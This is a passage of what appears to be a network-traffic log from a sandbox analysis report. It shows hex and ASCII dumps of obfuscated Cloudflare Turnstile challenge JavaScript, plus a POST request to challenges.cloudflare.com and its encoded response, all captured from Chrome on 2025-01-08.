                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 67 4d 28 31 34 39 32 29 2c 6a 5b 67 4d 28 33 37 30 29 5d 3d 67 4d 28 31 34 30 39 29 2c 6a 5b 67 4d 28 36 38 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 65 4f 28 67 5b 67 4d 28 32 30 30 29 5d 2c 67 5b 67 4d 28 31 34 36 38 29 5d 29 2c 67 5b 67 4d 28 32 30 30 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 7b 69 66 28 67 4d 28 35 38 31 29 21 3d 3d 6b 5b 67 4d 28 31 31 38 30 29 5d 29 67 5b 67 4d 28 32 30 30 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 31 31 30 33 29 5d 28 67 5b 67 4d 28 32 30 30 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 34 33 33 29 5d 28 67 5b 67 4d 28 32 30 30 29 5d 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 48 3d 6b 5b 67 4d 28 31 32 30 36 29 5d 28 67 2c 36 35 35
                                                                                                Data Ascii: gM(1492),j[gM(370)]=gM(1409),j[gM(686)]=function(G,H){return G+H},j);try{if(l=eO(g[gM(200)],g[gM(1468)]),g[gM(200)]instanceof Error){if(gM(581)!==k[gM(1180)])g[gM(200)]=JSON[gM(1103)](g[gM(200)],Object[gM(433)](g[gM(200)]));else return H=k[gM(1206)](g,655
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 5b 67 4e 28 31 32 38 31 29 5d 5b 67 4e 28 34 39 30 29 5d 28 27 5c 6e 27 29 2c 67 5b 67 4e 28 33 30 30 29 5d 28 6c 5b 67 4e 28 31 32 35 34 29 5d 2c 31 29 29 26 26 28 6d 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6e 3d 6c 5b 31 5d 5b 67 4e 28 31 30 38 33 29 5d 28 6d 29 2c 6e 26 26 28 69 3d 6e 5b 31 5d 2c 6a 3d 70 61 72 73 65 49 6e 74 28 6e 5b 32 5d 2c 31 30 29 2c 6b 3d 70 61 72 73 65 49 6e 74 28 6e 5b 33 5d 2c 31 30 29 29 29 3a 68 3d 4a 53 4f 4e 5b 67 4e 28 31 31 30 33 29 5d 28 65 29 3b 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 67 4e 28 36 34 38 29 5d 3d 68 2c 6f 5b 67 4e 28 31 34 36 38 29 5d 3d 69 2c 6f 5b 67 4e 28 31 32 32 34 29 5d 3d 6a 2c 6f 5b 67 4e 28 31 30 39 34 29 5d 3d 6b 2c 6f 5b 67 4e 28 32 30 30 29 5d
                                                                                                Data Ascii: [gN(1281)][gN(490)]('\n'),g[gN(300)](l[gN(1254)],1))&&(m=/^\s*at\s+(.+):(\d+):(\d+)/,n=l[1][gN(1083)](m),n&&(i=n[1],j=parseInt(n[2],10),k=parseInt(n[3],10))):h=JSON[gN(1103)](e);return o={},o[gN(648)]=h,o[gN(1468)]=i,o[gN(1224)]=j,o[gN(1094)]=k,o[gN(200)]
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 68 4a 73 63 54 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 5e 66 7d 2c 27 56 74 4b 6d 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 5e 67 7d 2c 27 53 4e 78 78 47 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 5e 67 7d 2c 27 69 57 73 6c 47 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 26 66 7d 2c 27 48 56 6a 6f 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 6c 56 71 73 6d 27 3a 68 42 28 32 35 33 29 2c 27 75 64 58 75 62 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 28 67 2c 68 29 7d 2c 27 43
                                                                                                Data Ascii: ':function(f,g){return f-g},'hJscT':function(f,g){return g^f},'VtKmo':function(f,g){return f^g},'SNxxG':function(f,g){return f^g},'iWslG':function(f,g){return g&f},'HVjom':function(f,g){return f-g},'lVqsm':hB(253),'udXub':function(f,g,h){return f(g,h)},'C
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 7b 69 39 3d 67 4a 2c 63 3d 7b 27 6f 67 4d 56 52 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 39 28 39 37 33 29 5d 5b 69 39 28 31 33 38 37 29 5d 7c 7c 31 65 34 2c 65 3d 66 50 28 29 2c 21 65 4d 5b 69 39 28 37 38 31 29 5d 26 26 21 63 5b 69 39 28 39 37 32 29 5d 28 66 75 29 26 26 21 65 4d 5b 69 39 28 38 33 31 29 5d 5b 69 39 28 37 34 30 29 5d 26 26 65 2d 66 4f 3e 64 3f 69 39 28 31 30 31 38 29 21 3d 3d 69 39 28 32 36 35 29 3f 66 61 28 29 3a 65 28 66 2e 69 64 29 3a 66 62 28 29 7d 2c 31 65 33 29 29 2c 66 53 3d 7b 7d 2c 66 53 5b 67 4a 28 37 34 30 29 5d 3d 21 5b 5d 2c 66 53 5b 67 4a 28 33 36 36 29 5d 3d 65 55 2c 66 53 5b 67 4a 28 32 31 35 29 5d 3d 66 47 2c 66 53 5b 67 4a 28 31 30 32 34 29 5d 3d 66 4c 2c 66 53 5b
                                                                                                Data Ascii: {i9=gJ,c={'ogMVR':function(f){return f()}},d=eM[i9(973)][i9(1387)]||1e4,e=fP(),!eM[i9(781)]&&!c[i9(972)](fu)&&!eM[i9(831)][i9(740)]&&e-fO>d?i9(1018)!==i9(265)?fa():e(f.id):fb()},1e3)),fS={},fS[gJ(740)]=![],fS[gJ(366)]=eU,fS[gJ(215)]=fG,fS[gJ(1024)]=fL,fS[
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 6a 4e 44 6b 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 64 41 78 70 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 76 55 59 47 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 61 57 69 44 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 4d 72 63 54 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 54 6f 79 70 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 69 68 4b 6b 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68
                                                                                                Data Ascii: F':function(h,i){return h|i},'jNDkN':function(h,i){return h(i)},'dAxpS':function(h,i){return h==i},'vUYGe':function(h,i){return h(i)},'aWiDS':function(h,i){return h!=i},'MrcTv':function(h,i){return i&h},'Toypw':function(h,i){return i*h},'ihKkF':function(h
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 29 3f 28 49 3d 30 2c 47 5b 69 64 28 31 33 38 34 29 5d 28 64 5b 69 64 28 31 33 36 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 4d 7c 48 3c 3c 31 2e 31 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 69 64 28 31 33 38 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 69 64 28 34 30 31 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 69 64 28 34 31 32 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 69 64 28 31 34 36 34 29 5d 28 48 2c 31 29 7c 31 2e 31 33 26 4d 2c 49 3d 3d 64 5b 69 64 28 31 33 39 35 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 64 28 31 33 38 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49
                                                                                                Data Ascii: )?(I=0,G[id(1384)](d[id(1365)](o,H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;s<F;H=M|H<<1.11,I==j-1?(I=0,G[id(1384)](o(H)),H=0):I++,M=0,s++);for(M=C[id(401)](0),s=0;d[id(412)](16,s);H=d[id(1464)](H,1)|1.13&M,I==d[id(1395)](j,1)?(I=0,G[id(1384)](o(H)),H=0):I
                                                                                                2025-01-08 13:48:15 UTC1369INData Raw: 48 3d 48 3c 3c 31 7c 31 26 4d 2c 64 5b 69 64 28 31 34 36 37 29 5d 28 49 2c 64 5b 69 64 28 31 33 39 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 69 64 28 31 33 38 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 44 3d 3d 30 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 64 5b 69 64 28 36 32 37 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 69 64 28 38 34 31 29 5d 28 48 3c 3c 31 2e 35 2c 4d 26 31 29 2c 49 3d 3d 64 5b 69 64 28 39 36 37 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 64 28 31 33 38 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 29 7b 47 5b 69 64 28 31 33 38 34 29 5d 28 6f 28 48 29
                                                                                                Data Ascii: H=H<<1|1&M,d[id(1467)](I,d[id(1395)](j,1))?(I=0,G[id(1384)](o(H)),H=0):I++,M>>=1,s++);D--,D==0&&F++}for(M=2,s=0;d[id(627)](s,F);H=d[id(841)](H<<1.5,M&1),I==d[id(967)](j,1)?(I=0,G[id(1384)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,I==j-1){G[id(1384)](o(H)


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                14192.168.2.549740104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:15 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 3192
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                CF-Challenge: 1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:15 UTC3192OUTData Raw: 76 5f 38 66 65 63 61 34 64 38 66 63 66 35 63 33 33 34 3d 50 42 45 24 64 24 4e 24 36 24 70 24 44 66 72 56 66 72 54 24 66 49 47 4d 6e 57 66 68 72 6e 58 53 72 31 54 72 4f 37 74 4f 56 63 6e 72 47 49 6e 4d 30 74 63 4e 72 54 72 45 49 66 59 4f 55 72 7a 74 72 4d 30 43 59 24 68 30 72 5a 24 66 30 59 66 71 62 46 4f 59 72 4c 24 62 62 73 72 41 74 72 36 41 78 68 37 4f 57 72 47 69 42 6e 47 6c 24 45 54 57 61 72 50 48 45 72 56 72 65 4a 33 72 34 36 6d 71 57 70 71 52 5a 4d 36 72 4b 59 52 34 62 4f 39 71 56 58 30 4d 39 46 63 72 62 57 57 65 49 25 32 62 30 7a 44 6c 44 53 6a 7a 67 72 62 55 4b 62 66 52 77 59 34 63 6b 71 24 72 63 68 72 4f 2d 72 63 4d 72 50 49 49 72 62 73 65 59 6f 75 58 7a 6e 45 24 72 53 49 72 64 65 4e 46 2d 72 6e 58 72 71 34 57 34 6e 66 46 5a 37 24 37 4e 52 64 63
                                                                                                Data Ascii: v_8feca4d8fcf5c334=PBE$d$N$6$p$DfrVfrT$fIGMnWfhrnXSr1TrO7tOVcnrGInM0tcNrTrEIfYOUrztrM0CY$h0rZ$f0YfqbFOYrL$bbsrAtr6Axh7OWrGiBnGl$ETWarPHErVreJ3r46mqWpqRZM6rKYR4bO9qVX0M9FcrbWWeI%2b0zDlDSjzgrbUKbfRwY4ckq$rchrO-rcMrPIIrbseYouXznE$rSIrdeNF-rnXrq4W4nfFZ7$7NRdc
                                                                                                2025-01-08 13:48:16 UTC759INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:16 GMT
                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                Content-Length: 152972
                                                                                                Connection: close
                                                                                                cf-chl-gen: YQxCo7SHwAwjcaE8imv/jLg0uEo0EmCN4Nl64pGAIkXABA45DMAmPL1SPaEqa2N45d4KgAGw91LHiPDEyf1tPoACs0A0lrTlof+ApTKashGPv6u5qBpvRY+uYdH2//2d1rblhqV+KCyaT/J2FhyFjxTTzckrPCz1FQwDKCbTPNknrMhErbXS9TO4B7LXCFfTC09Gc1Auv8PE8GRdo+9vRDxjLjWZdKMi5GNAM2hTeQtMy0D0QzoBs3OuYCouiLzIwsr6KwERmPqlH/Jo6axu1nWAxlrCY8aMDnrOlU6S5gYQRIZAcr82gKMfmSKNiJ7y8aecHCDfmaphRZI6ZA8zbsgRw5e/m3Yaxe+xKrDGrvlrnqpyneH29AGXrfvPoM9jkNPfPGGztC8xENt4PUqRDdtcl108r3L/47TMe2bxS/zFFkUUaIUeCXpiuJ97U4PD0b35n7SzUKw/XBTDe9AbSTw/olm4iZCcZUhWsoR1uZP0RXeIAssAVq0dZQ==$lW+YJ7+ByszUmMc/
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4e7d895c34d-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:16 UTC610INData Raw: 5a 46 64 74 57 5a 64 2b 65 49 43 54 58 71 42 73 65 46 2b 67 59 58 61 70 59 61 74 2b 65 49 4b 59 6e 6f 74 75 63 59 6c 2b 70 4a 61 46 68 58 4b 6b 71 70 64 2b 66 5a 56 34 72 4c 61 67 75 49 35 35 70 5a 6d 57 78 62 6a 4f 71 36 69 68 71 73 44 4e 77 71 2b 4f 6c 61 32 51 30 4d 2b 70 30 4c 4f 77 76 62 47 75 32 39 43 63 72 73 4f 31 32 72 37 4c 77 4f 7a 63 32 72 32 37 35 72 7a 47 78 50 48 42 30 50 6e 6b 38 39 54 39 36 50 6e 55 7a 64 59 46 30 63 37 32 30 4e 6e 2b 42 63 58 6d 2f 4f 2f 67 37 4d 67 4f 2f 51 50 76 41 74 58 74 43 67 55 64 38 41 30 4a 49 66 54 72 46 79 51 6c 32 78 6a 6a 2f 50 66 6d 39 50 30 45 2b 43 49 46 48 77 63 72 45 78 59 44 4b 43 58 77 44 7a 55 52 43 52 4d 30 45 68 30 4c 2f 68 67 51 2f 53 63 33 4a 43 59 36 52 43 6b 65 55 53 4d 77 51 54 45 66 44 43 46
                                                                                                Data Ascii: ZFdtWZd+eICTXqBseF+gYXapYat+eIKYnotucYl+pJaFhXKkqpd+fZV4rLaguI55pZmWxbjOq6ihqsDNwq+Ola2Q0M+p0LOwvbGu29CcrsO12r7LwOzc2r275rzGxPHB0Pnk89T96PnUzdYF0c720Nn+BcXm/O/g7MgO/QPvAtXtCgUd8A0JIfTrFyQl2xjj/Pfm9P0E+CIFHwcrExYDKCXwDzURCRM0Eh0L/hgQ/Sc3JCY6RCkeUSMwQTEfDCF
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 4e 65 52 54 6b 32 48 79 68 65 55 7a 59 32 50 55 55 36 59 32 42 4d 61 57 4e 74 56 30 52 6d 5a 6a 4a 51 63 6c 46 4a 58 46 39 62 68 46 68 37 57 47 4e 6b 61 58 68 6c 56 58 69 4b 61 6f 71 44 66 6e 4b 46 54 48 56 6b 64 47 78 54 67 35 4f 52 6c 70 2b 51 63 33 32 4c 66 71 43 6b 6f 6c 71 6a 71 4b 65 67 70 32 70 75 6a 6d 32 75 66 57 75 66 69 71 57 4c 64 6e 43 30 63 33 65 79 70 37 48 42 75 5a 6e 46 6a 72 48 46 74 71 57 4b 69 59 71 4a 77 73 53 6c 72 63 4c 55 70 73 69 56 30 4e 53 5a 72 39 50 45 30 74 62 53 6b 74 47 32 6c 62 32 68 30 72 47 65 30 38 4c 46 76 61 76 44 79 64 44 52 78 76 50 53 72 36 7a 53 39 62 62 33 36 62 6a 30 39 73 2f 70 2b 50 72 54 38 66 7a 2b 31 2b 4d 42 41 39 76 72 42 51 66 67 35 77 6b 4c 35 4e 38 4e 44 2b 6a 6e 45 52 50 72 32 68 55 58 37 39 59 5a 47
                                                                                                Data Ascii: NeRTk2HyheUzY2PUU6Y2BMaWNtV0RmZjJQclFJXF9bhFh7WGNkaXhlVXiKaoqDfnKFTHVkdGxTg5ORlp+Qc32LfqCkolqjqKegp2pujm2ufWufiqWLdnC0c3eyp7HBuZnFjrHFtqWKiYqJwsSlrcLUpsiV0NSZr9PE0tbSktG2lb2h0rGe08LFvavDydDRxvPSr6zS9bb36bj09s/p+PrT8fz+1+MBA9vrBQfg5wkL5N8ND+jnERPr2hUX79YZG
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 37 53 6d 59 6b 52 56 39 6d 61 45 68 41 61 43 39 41 64 7a 4e 4f 64 33 6c 49 62 33 68 56 64 48 64 30 62 33 68 37 64 34 4e 38 66 33 73 39 67 49 4e 2f 5a 59 53 48 67 33 2b 49 69 34 4b 47 64 49 4e 5a 68 35 43 54 69 6c 64 2b 6d 56 2b 4c 6c 5a 53 6e 6c 48 65 68 67 35 78 34 70 6e 65 67 66 4a 74 37 70 49 43 67 66 36 69 45 70 59 4f 73 69 4b 71 48 73 49 79 76 69 37 53 51 74 49 2b 34 6c 4c 6d 54 76 4a 69 70 68 72 79 48 69 70 2b 72 6f 59 75 6a 78 4a 62 56 70 38 69 53 70 71 76 4d 34 64 48 63 33 65 47 6a 6e 4a 32 6b 36 62 4c 6f 33 5a 2f 73 79 63 32 76 78 37 33 6e 79 4d 53 75 39 39 66 6e 31 76 6a 78 39 4e 2f 54 39 2f 7a 76 38 64 45 44 38 4f 4c 47 78 4e 50 59 41 66 6f 52 42 38 33 6e 42 39 33 56 37 4e 62 75 43 51 6e 30 48 4e 76 31 44 77 45 5a 38 42 58 34 49 2f 67 46 2f 42
                                                                                                Data Ascii: 7SmYkRV9maEhAaC9AdzNOd3lIb3hVdHd0b3h7d4N8f3s9gIN/ZYSHg3+Ii4KGdINZh5CTild+mV+LlZSnlHehg5x4pnegfJt7pICgf6iEpYOsiKqHsIyvi7SQtI+4lLmTvJiphryHip+roYujxJbVp8iSpqvM4dHc3eGjnJ2k6bLo3Z/syc2vx73nyMSu99fn1vjx9N/T9/zv8dED8OLGxNPYAfoRB83nB93V7NbuCQn0HNv1DwEZ8BX4I/gF/B
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 53 43 39 62 5a 45 6b 7a 58 32 68 4f 4e 32 4e 72 4f 6b 74 59 67 59 41 2f 61 33 4e 44 59 32 2b 42 67 49 4a 68 57 6a 39 69 61 59 5a 66 5a 6d 32 4f 59 32 70 77 6c 6d 64 75 64 46 4e 72 63 6e 68 62 62 33 5a 38 5a 4b 56 75 70 4a 31 62 71 49 56 2f 6d 36 57 4f 5a 32 75 70 71 35 56 31 69 36 2b 67 72 71 69 56 6b 58 75 57 6d 71 71 30 6c 72 53 6b 75 5a 78 2b 70 4c 79 31 69 61 65 48 79 63 32 6a 78 38 61 46 77 61 48 53 77 4c 6a 52 71 61 79 37 6e 5a 32 70 75 5a 33 4e 33 65 44 50 76 73 47 2f 31 2b 48 4b 70 4d 62 6c 35 39 75 78 78 37 44 63 35 4f 54 52 77 62 66 50 78 4e 58 50 32 73 76 41 36 2b 33 42 33 37 34 43 7a 39 73 41 2f 73 76 72 7a 63 33 66 34 77 67 4d 36 51 4c 68 45 77 48 35 47 66 6e 6a 36 42 45 5a 39 52 55 59 46 43 41 5a 48 42 6a 5a 48 53 41 63 41 69 45 6b 49 41 6b
                                                                                                Data Ascii: SC9bZEkzX2hON2NrOktYgYA/a3NDY2+BgIJhWj9iaYZfZm2OY2pwlmdudFNrcnhbb3Z8ZKVupJ1bqIV/m6WOZ2upq5V1i6+grqiVkXuWmqq0lrSkuZx+pLy1iaeHyc2jx8aFwaHSwLjRqay7nZ2puZ3N3eDPvsG/1+HKpMbl59uxx7Dc5OTRwbfPxNXP2svA6+3B374Cz9sA/svrzc3f4wgM6QLhEwH5Gfnj6BEZ9RUYFCAZHBjZHSAcAiEkIAk
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 55 52 70 5a 6e 78 55 63 6c 6c 75 64 6e 78 66 65 44 78 64 66 55 52 77 55 6c 71 41 68 6b 68 72 62 6e 78 49 58 6e 78 30 58 31 4e 34 6c 59 36 5a 68 4a 46 6f 64 6f 71 65 6f 57 71 52 67 31 75 6b 67 59 4b 6e 70 61 6d 6d 71 58 6d 59 62 33 71 44 68 6e 2b 73 72 6f 64 79 73 4c 4b 4b 73 70 71 4e 6c 6f 2b 34 75 70 4b 2f 6f 72 37 44 76 4c 2b 46 70 34 7a 4d 74 73 6d 77 30 4b 54 52 74 4e 53 6c 6e 37 6a 59 71 62 4f 38 33 4b 33 4e 77 4f 43 78 34 63 54 6b 74 71 2f 49 36 4c 72 4b 76 38 43 75 33 62 69 38 75 76 43 75 74 4d 43 2f 31 37 62 6c 2b 4f 37 47 35 73 38 43 76 75 33 77 39 73 30 49 41 74 76 47 39 65 4c 2b 31 66 67 43 36 38 34 46 79 51 66 67 79 41 48 35 47 75 30 4b 43 2b 38 4a 45 4e 76 75 32 4f 4c 77 47 4f 48 35 41 2f 4c 35 35 53 66 6c 41 51 6b 6e 4a 51 63 45 41 53 49 78
                                                                                                Data Ascii: URpZnxUclludnxfeDxdfURwUlqAhkhrbnxIXnx0X1N4lY6ZhJFodoqeoWqRg1ukgYKnpammqXmYb3qDhn+srodysLKKspqNlo+4upK/or7DvL+Fp4zMtsmw0KTRtNSln7jYqbO83K3NwOCx4cTktq/I6LrKv8Cu3bi8uvCutMC/17bl+O7G5s8Cvu3w9s0IAtvG9eL+1fgC684FyQfgyAH5Gu0KC+8JENvu2OLwGOH5A/L55SflAQknJQcEASIx
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 78 5a 57 54 39 56 58 47 35 38 56 46 4a 32 68 46 35 6c 66 6f 35 63 61 48 2b 4c 5a 49 4b 47 6c 57 65 57 68 70 52 75 6e 47 32 58 68 33 68 66 67 48 52 2b 62 4a 32 51 6c 6f 43 71 64 36 71 62 68 6f 43 49 6d 70 43 44 6a 61 36 73 6e 34 42 34 71 34 74 79 64 36 57 52 6e 4b 47 74 6f 37 61 68 75 5a 61 6c 66 37 69 30 6d 4b 6d 70 71 35 79 70 72 62 75 38 76 71 61 70 6a 64 53 4c 70 64 79 73 70 36 61 6e 30 4b 47 2b 74 61 37 4f 31 4d 47 2f 31 2b 47 36 32 4b 53 36 32 4e 71 37 72 39 54 78 36 76 58 67 37 4c 6a 6c 73 2f 72 47 7a 39 58 4b 39 64 62 75 33 41 62 6c 42 50 72 33 39 67 6a 2b 2b 2f 6f 41 36 63 30 41 79 77 73 41 38 2b 38 50 44 67 6a 32 42 75 67 53 32 75 77 54 44 79 58 38 42 67 4d 46 2f 66 30 4a 46 52 72 74 2f 41 63 74 34 2f 30 78 36 2b 38 31 38 79 55 44 43 77 73 33 39
                                                                                                Data Ascii: xZWT9VXG58VFJ2hF5lfo5caH+LZIKGlWeWhpRunG2Xh3hfgHR+bJ2QloCqd6qbhoCImpCDja6sn4B4q4tyd6WRnKGto7ahuZalf7i0mKmpq5yprbu8vqapjdSLpdysp6an0KG+ta7O1MG/1+G62KS62Nq7r9Tx6vXg7Ljls/rGz9XK9dbu3AblBPr39gj++/oA6c0AywsA8+8PDgj2BugS2uwTDyX8BgMF/f0JFRrt/Act4/0x6+818yUDCws39
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 33 63 6f 68 68 5a 47 52 36 68 32 64 74 58 31 79 43 66 70 53 4b 67 47 68 77 67 70 68 53 5a 59 2b 55 69 33 78 71 6c 70 5a 65 63 4a 5a 68 65 59 46 6a 59 61 70 36 5a 33 61 72 70 4b 74 75 63 70 4a 78 74 70 4f 6e 6f 34 4b 56 6c 36 75 31 77 49 2f 43 6c 72 61 43 76 4a 61 58 67 73 43 61 6d 34 4f 2f 75 71 2f 45 75 73 65 67 73 4b 65 6e 7a 49 2b 53 32 4a 66 49 70 71 36 5a 32 70 69 77 73 4c 48 41 77 62 54 63 6f 36 44 45 33 61 76 72 33 61 36 78 78 37 4c 4b 31 4f 54 52 77 62 66 50 78 39 69 30 30 62 66 52 36 2f 7a 78 31 4d 32 38 78 74 54 35 39 67 33 73 41 2b 48 61 32 52 48 6b 37 42 4d 4c 45 68 59 48 2b 73 7a 75 47 2f 54 70 48 52 4d 69 36 68 4c 76 32 79 55 43 42 42 67 69 42 2f 73 76 41 79 50 74 4d 76 6f 78 4b 75 63 31 45 68 67 6f 4d 68 76 7a 39 6a 59 34 44 67 49 66 4c 43
                                                                                                Data Ascii: 3cohhZGR6h2dtX1yCfpSKgGhwgphSZY+Ui3xqlpZecJZheYFjYap6Z3arpKtucpJxtpOno4KVl6u1wI/ClraCvJaXgsCam4O/uq/EusegsKenzI+S2JfIpq6Z2piwsLHAwbTco6DE3avr3a6xx7LK1OTRwbfPx9i00bfR6/zx1M28xtT59g3sA+Ha2RHk7BMLEhYH+szuG/TpHRMi6hLv2yUCBBgiB/svAyPtMvoxKuc1EhgoMhvz9jY4DgIfLC
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 57 48 6c 58 67 46 78 2b 53 6d 75 4b 54 6f 52 78 63 56 64 76 69 35 71 55 62 33 6d 4f 6d 47 2b 53 6a 32 56 37 65 5a 53 58 6d 49 56 35 61 34 53 66 71 71 69 41 67 34 43 6e 6f 6d 2b 49 6c 59 65 72 63 36 57 50 6d 4b 36 34 72 4a 79 79 78 70 6e 48 75 73 6d 30 70 62 62 4c 6f 61 6e 43 30 61 43 69 6f 4c 4f 6f 73 4c 44 58 71 37 53 56 6c 36 6a 65 32 5a 33 66 30 61 4f 75 74 37 62 69 70 37 37 72 72 4b 33 44 72 4e 7a 66 77 37 4c 47 73 66 62 73 35 75 50 43 39 72 6e 33 74 74 66 39 33 39 50 53 2b 4e 63 43 36 41 6a 6d 31 4d 76 73 41 77 37 34 42 75 50 38 41 78 4d 57 33 68 55 61 79 78 6e 31 35 64 76 31 45 50 77 42 38 66 37 30 47 2f 77 6f 42 53 58 34 39 67 30 6c 2b 2f 72 34 4a 51 49 50 4c 52 48 6f 45 44 4d 6a 46 44 63 63 2f 50 30 54 45 51 77 4e 51 51 55 41 45 52 49 48 42 55 67
